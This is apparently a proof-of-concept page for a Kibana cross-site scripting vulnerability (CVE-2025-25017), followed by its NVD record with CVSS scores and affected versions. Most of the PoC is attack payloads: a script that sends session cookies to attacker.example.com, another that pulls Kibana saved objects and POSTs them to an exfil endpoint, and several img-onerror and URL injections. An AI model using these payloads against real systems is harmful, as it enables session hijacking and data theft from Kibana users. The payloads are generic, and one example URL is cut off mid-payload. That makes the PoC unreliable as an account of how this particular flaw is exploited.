CVE-2025-25017

<!-- CVE-2025-25017 - Kibana XSS PoC Vulnerability: Improper Neutralization of Input During Web Page Generation This PoC demonstrates how an attacker can inject malicious JavaScript through unescaped user input fields in Kibana. --> <!-- Example 1: Reflected XSS via URL parameter --> <!-- Attacker crafts a malicious URL and sends it to a logged-in Kibana user --> https://kibana.example.com/app/discover#/?_g=(filters:!())&_a=(query:(language:kuery,query:')) <!-- Example 2: XSS payload injected into a dashboard visualization title --> <script> // Malicious payload - steal session cookie or perform actions on behalf of the user fetch('https://attacker.example.com/steal?cookie=' + document.cookie); // Or exfiltrate Elasticsearch data accessible to the victim fetch('/api/saved_objects/_find?type=index-pattern&fields=title') .then(r => r.json()) .then(data => { fetch('https://attacker.example.com/exfil', { method: 'POST', body: JSON.stringify(data) }); }); </script> <!-- Example 3: Stored XSS via index pattern or field name --> <!-- When an admin creates an index pattern with a malicious name --> <img src=x onerror="alert('XSS via Kibana CVE-2025-25017')"> <!-- Example 4: URL-based XSS in Kibana lens visualization --> https://kibana.example.com/app/lens#/edit/<img/src=x onerror=alert(document.domain)>

{"cve": {"id": "CVE-2025-25017", "sourceIdentifier": "[email protected]", "published": "2025-10-10T10:15:32.900", "lastModified": "2025-10-30T14:29:18.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation in Kibana can lead to Cross-Site Scripting (XSS)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "8.18.8", "matchCriteriaId": "DC3153A3-2F19-4238-9365-62F1CEB5BB09"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.19.0", "versionEndExcluding": "8.19.4", "matchCriteriaId": "72E852B6-81A1-40E8-BD2C-70A6272EA31F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.0.7", "matchCriteriaId": "64BD24C3-4FAB-4446-87C0-5A75A882506F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.1.0", "versionEndExcluding": "9.1.4", "matchCriteriaId": "77B25D2C-3471-4B57-B0A9-0896E7779887"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-8-18-8-8-19-4-9-0-7-9-1-4-security-update-esa-2025-16/382450", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}